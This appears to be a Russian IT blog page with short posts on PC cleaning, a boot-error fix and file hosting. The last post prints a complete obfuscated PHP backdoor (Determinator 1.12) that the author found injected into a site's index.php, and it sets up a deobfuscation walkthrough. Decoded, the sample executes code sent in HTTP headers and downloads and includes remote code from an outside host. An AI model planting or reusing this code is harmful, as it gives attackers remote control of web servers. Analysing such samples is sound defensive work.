Как довести компьютер до ручки?? =)

Привезли компьютер, говорят перезагружается, просили посмотреть =) Сперва думал что-то из серии оперативная память/жесткий диск/перегрев, но даже не включая компьютер всё стало ясно =)))) Итак, сегодня у нас маленький IT-комикс.

Главный положительный герой:

Это Samsung VC-5915 (Red)

Он у нас в роли Мойдодыра сегодня =) Теперь антипод и его главный противник:

Это как вы поняли системный блок..

Ну а врага, как известно, надо знать в лицо:

Это системный блок, собранный в компании Столица

А теперь, резонный вопрос. В чем же суть борьбы нашего Мойдодыра  с корнем зла в лице системного блока собранного в фирме Столица??? Дело в том, что после любого перемещения данного системника, остаются весьма характерные следы. Примерно такие:

Фуууууу =)

О май гадабл!! =)

Под катом продолжение, много картинок =) Честно говоря, давно такой жести не видел =) Всем кто озадачен вопросом чистить или не чистить системный блок внутри рекомендуется к просмотру.

HELP!! Синий экран!! UNMOUNTABLE_BOOT_VOLUME

Синий экран смерти при загрузке

Синий экран и сообщение UNMOUNTABLE_BOOT_VOLUME. Как на картинке. Выскакивает практически сразу при загрузке. Неприятная штука, которая однозначно свидетельствуют о проблемах с жестким. Теперь что с ними делать. Правильная последовательность действий, которая при хорошем раскладе позволит вам загрузиться в вашу Windows и оглядеться привычным для вас способом, сделать резервные копии важных данных. Самое главное, нам обязательно потребуется загрузочный диск. Можно использовать оригинальный установочный диск Microsoft Windows XP, а можно использовать разного рода Hirens Boot CD или даже Zver DVD как, пожалуй, более комплексный инструмент по восстановлению системы. Проблему надо решать и основным ориентиром будем считать минимальное время решения проблемы и минимальность внесения изменений в структуру файловой систем и геометрии жесткого диска.

Файловый хостинг с прямой ссылкой на скачивание

Беда приходит откуда не ждешь. Приболел немного.. остался дома А тут звонок срочный с работы. В итоге надо перекинуть файл с домашнего компьютера ~2ГБ на компьютер в корпоративной сети. При этом в Интернет светит лишь корпоративный веб-сервер под управлением FreeBSD. А домашний компьютер находится во внутренней провайдерской сети и имеет внутренний ip вида 10.1.15.2. Вот незадача. Итого мне срочно понадобилось файловое хранилище отвечающее следующим требованиям:

1. Возможность скачивания по прямой ссылке
2. Возможность быстрого удаления файлов после скачки
3. Ограничение на суммарный объём предоставляемого места более 2.5ГБ
4. Ограничение на объём одного файла более 2.5ГБ
5. Бесплатный или безвозмездный =)

Читаем дальше.

Determinator. Versio 1.12.

В преддверии очередного конкурса RuCTF хочу рассказать о небольшой задачке, которую подкинула сама жизнь. Всё началось с того, что мною были предоставлены логин и пароль для доступа к хостинг-площадке. Являясь администратором данного сервера, я периодически мониторю пользовательскую активность. Не буду приводить лишние логи, просто увидел подозрительную пользовательскую активность и заметил, что в файлах на моем веб-сервере появился лишний код, причем очень любопытный. Вот например, примерчик из index.php:

<?php /*versio:1.12*/if (!defined ("determinator")){eval(base64_decode('ZnVuY3Rpb24gdVAxUFFvWmZhZXpHN0xDSWVIek10OTczZ0RJZ2NnbDlQbWNmU0VkTkRMUUJoWGg4T2E1MEY0bGg0SDIwb0NGcSgkcWwxNk9HQTNRZkl2MlFYSjZkSEF1ZzhKbWZyRXBhaURjcm1FRnJPZFRWVFNnUjFDb0pmQVVRUDNqR3pORVV4bCl7cmV0dXJuIGV2YWwoJHFsMTZPR0EzUWZJdjJRWEo2ZEhBdWc4Sm1mckVwYWlEY3JtRUZyT2RUVlRTZ1IxQ29KZkFVUVAzakd6TkVVeGwpO307ZnVuY3Rpb24gaG9lMTdwcDRRYkVYZkZlU0dkTFZaWG5yMFFwWmY0aE5qc0lidlA5RkJEVVJoUVg5cmFHYUpWZEVIZEp6c3E3bygkek5WNUxwMHowclBqRzBhdHhMcHhBTWViRTlSaTZDTklEQ1FqdnJqYloyZHhpM0JYM0RBNDBhMDdPRWFDYTM4MSl7cmV0dXJuIGJhc2U2NF9kZWNvZGUoJHpOVjVMcDB6MHJQakcwYXR4THB4QU1lYkU5Umk2Q05JRENRanZyamJaMmR4aTNCWDNEQTQwYTA3T0VhQ2EzODEpO307ZnVuY3Rpb24gZUFmQjJmZFVRSkVQUFNGYXFtbkJtb2gyeG9IZXZnc21RSkQxZGFkZ1JCUjdxc2pOZ2VPR1Q4NmxhTGxvTEUxbCgkbENpaWV6c0YzYm1Uam9pNjlHWkxFemQzaTg1WGNGYnhBbE9EZ05neGRpQTRCUWZzTW5yQXRYdDFwVFpTZVNUMCl7cmV0dXJuICRsQ2lpZXpzRjNibVRqb2k2OUdaTEV6ZDNpODVYY0ZieEFsT0RnTmd4ZGlBNEJRZnNNbnJBdFh0MXBUWlNlU1QwO307'));uP1PQoZfaezG7LCIeHzMt973gDIgcgl9PmcfSEdNDLQBhXh8Oa50F4lh4H20oCFq("\$rtC2fidXsiuJ49bsSRGVGTulRE1iR0IPOPLPPFlX7XOQxg5qJMdtGaqARqVczODX=\"ID8+PD9waHAKDQppZiAoIWRlZmluZWQoJ2RldGVybWluYXRvcicpKXsNCglmdW5jdGlvbiBmaWx0ZXIoKXsNCgkJZm9yZWFjaCAoJF9HRVQgYXMgJGs9PiR2KXsNCgkJCWlmIChzdHJwb3MoJHYsJ3VuaW9uJykpeyRfR0VUWyRrXT0nJzt9DQoJCQllbHNlaWYgKHN0cnBvcygkdiwnc2VsZWN0JykpeyRfR0VUWyRrXT0nJzt9DQoJCX0NCgl9DQoJZnVuY3Rpb24gZ2V0ZmlsZSgkdXJsKXsNCgkJaWYgKGluaV9nZXQoJ2FsbG93X3VybF9mb3BlbicpID09ICcxJykgew0KCQkJcmV0dXJuIEBmaWxlX2dldF9jb250ZW50cygkdXJsKTsNCgkJfQ0KCQllbHNlaWYgKGZ1bmN0aW9uX2V4aXN0cygnY3\";\$qzag2PJGViBvNroZVJBtucpirLzhqhsH4ba8NtdfGB3vVp4DJLXCHaG2aVedPTGD=\$rtC2fidXsiuJ49bsSRGVGTulRE1iR0IPOPLPPFlX7XOQxg5qJMdtGaqARqVczODX.\"VybF9pbml0Jykpew0KCQkJJGNoID0gQGN1cmxfaW5pdCgpOw0KCQkJQGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsJHVybCk7DQoJCQlAY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUixmYWxzZSk7DQoJCQlAY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLHRydWUpOw0KCQkJQGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCw1KTsNCgkJCWlmICgkZGF0YSA9IEBjdXJsX2V4ZWMoJGNoKSkge3JldHVybiAkZGF0YTt9DQoJCQlAY3VybF9jbG9zZSgkY2gpOw0KCQl9DQoJCWVsc2Ugew0KCQkJcmV0dXJuICc8aW1nIHNyYz0iJy4k\";\$izSFvLOZZfLx0L3Id8vqshucRpppZ56jGTLnQnBHaBhc6EzjZTm1U4u2M2TnNFnO=\$qzag2PJGViBvNroZVJBtucpirLzhqhsH4ba8NtdfGB3vVp4DJLXCHaG2aVedPTGD.\"dXJsLiciIHdpZHRoPSIxcHgiIGhlaWdodD0iMXB4IiAvPic7DQoJCX0NCgl9DQoJZnVuY3Rpb24gdXBkKCRmaWxlLCR1cmwpew0KCQkkaDA9QGZvcGVuKCRmaWxlLCd3Jyk7DQoJCUBmY2xvc2UoJGgwKTsNCgkJaWYgKEBpc19maWxlKCRmaWxlKSl7CXdyaXRlKCRmaWxlLGdldGZpbGUoJHVybCkpIDt9Ow0KCX0NCglmdW5jdGlvbiB3cml0ZSgkZmlsZSwkY29udGVudCl7DQoJCWlmIChAaXNfZmlsZSgkZmlsZSkpew0KCQkJJGg9QGZvcGVuKCRmaWxlLCd3Jyk7DQoJCQlAZndyaXRlKCRoLCRjb250ZW50KTsNCgkJCUBmY2xvc2UoJGgpOw0KCQkJQGhlYWRlcignWV9PdXQ6IGIycz0nKTsNCg\";\$bDJpgalTmsc753HoQ8zdILOHvhHBHqVC724mveCCC4Gb0ESMOM5q1q5zHnfQ0SmU=\$izSFvLOZZfLx0L3Id8vqshucRpppZ56jGTLnQnBHaBhc6EzjZTm1U4u2M2TnNFnO.\"kJfQ0KCX0NCglpbmlfc2V0KCdkaXNwbGF5X2Vycm9ycycsMCk7DQoJJHR5cGU9J2JvdCc7DQoJJHZlcj0nMS4xMic7DQoJJGVuPSJiYXNlNjRfZW5jb2RlIjsNCgkkZGU9ImJhc2U2NF9kZWNvZGUiOw0KCSRob3N0PXN0cnRvbG93ZXIoQCRfU0VSVkVSWyJIVFRQX0hPU1QiXSk7DQoJJHNjPUBtZDUoJGhvc3QuUEhQX1ZFUlNJT04uJHZlci5QSFBfT1MuJzQnKTsNCglkZWZpbmUoJ2RldGVybWluYXRvcicsMSk7IGZpbHRlcigpOw0KCWlmICgkdXJpPSRob3N0LkAkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSl7DQoJCSR0bXA9Jy90bXAvJzsNCgkJaWYgKCFlbXB0eSgkX0VOVlsnVE1QJ10pKSB7\";\$sHP7ZQTANrHhN9c80jOBI7z1Qfx62qvOH1XeVuRFXGhL0vzPEJbZ9QoGx7mBlD3m=\$bDJpgalTmsc753HoQ8zdILOHvhHBHqVC724mveCCC4Gb0ESMOM5q1q5zHnfQ0SmU.\"ICR0bXAgPSAgJF9FTlZbJ1RNUCddLicvJzsgfQ0KCQlpZiAoIWVtcHR5KCRfRU5WWydUTVBESVInXSkpIHsgJHRtcCA9ICRfRU5WWydUTVBESVInXS4nLyc7IH0NCgkJaWYgKCFlbXB0eSgkX0VOVlsnVEVNUCddKSkgeyAkdG1wID0gJF9FTlZbJ1RFTVAnXS4nLyc7IH0NCgkJJHRtcD0kdG1wLicuJy4kc2M7DQoJCWlmIChAJF9TRVJWRVJbIkhUVFBfWV9BVVRIIl09PSRzYyl7DQoJCQlAaGVhZGVyKCdZX1ZlcnNpbzogJy4kdmVyLiR0eXBlKTsNCgkJCWlmICgkY29kZT0kZGUoQCRfU0VSVkVSWydIVFRQX0VYRUNQSFAnXSkpew0KCQkJCUBldmFsKCRjb2RlKTsNCgkJCQlleGl0KDApOw0KCQ\";\$cjULv3a3LSpp9LT13Ffq3AeTimxeCjim8qCm1U0zObFc1zOfHx5G5M9Zi6xgt0T9=\$sHP7ZQTANrHhN9c80jOBI7z1Qfx62qvOH1XeVuRFXGhL0vzPEJbZ9QoGx7mBlD3m.\"kJfQ0KCQkJaWYgKCRjbWQ9JGRlKEAkX1NFUlZFUlsnSFRUUF9VUERBVEUnXSkpe3VwZCgkdG1wLCRjbWQpO30NCgkJCWlmICgkY21kPSRkZShAJF9TRVJWRVJbJ0hUVFBfUFVUQ09ERSddKSl7d3JpdGUoJHRtcCwkY21kKTt9DQoJCX0NCgkJJHVyaT1AdXJsZW5jb2RlKCR1cmkpOw0KCQlpZiAoQGlzX2ZpbGUoJHRtcCkpe0BpbmNsdWRlX29uY2UgKCR0bXApO30NCgkJZWxzZSB7dXBkKCR0bXAsImh0dHA6Ly8iLiJnZXRwcm90Ii4ib2J5Ii4ibnVtYmVyLiIuImNvbSIuIi9pL3JlbSIuIi5waHA/dT0iLiR1cmkuIiZrPSIuJHNjLiImdD0iLiR0eXBlKTt9DQogICAgfQ0KfQ0KPz48P3BocCA=\"; uP1PQoZfaezG7LCIeHzMt973gDIgcgl9PmcfSEdNDLQBhXh8Oa50F4lh4H20oCFq(eAfB2fdUQJEPPSFaqmnBmoh2xoHevgsmQJD1dadgRBR7qsjNgeOGT86laLloLE1l(hoe17pp4QbEXfFeSGdLVZXnr0QpZf4hNjsIbvP9FBDURhQX9raGaJVdEHdJzsq7o(\$cjULv3a3LSpp9LT13Ffq3AeTimxeCjim8qCm1U0zObFc1zOfHx5G5M9Zi6xgt0T9))); ");}?>

Как видите, говоря "очень любопытный" я не лукавил)) Опытный глаз сразу поймет, что это обфусцированный код. Задача деобфускации всегда порождает очень много вопросов, особенно у тех, кто впервые сталкивается с обфусцированным кодом. Причем скажу, что написать какой-то универсальный деобфускатор архисложная задача ввиду очень большого числа подходов и методов к обфускации кода. Поэтому на живом реальном примере покажу, что надо делать с такой штукой.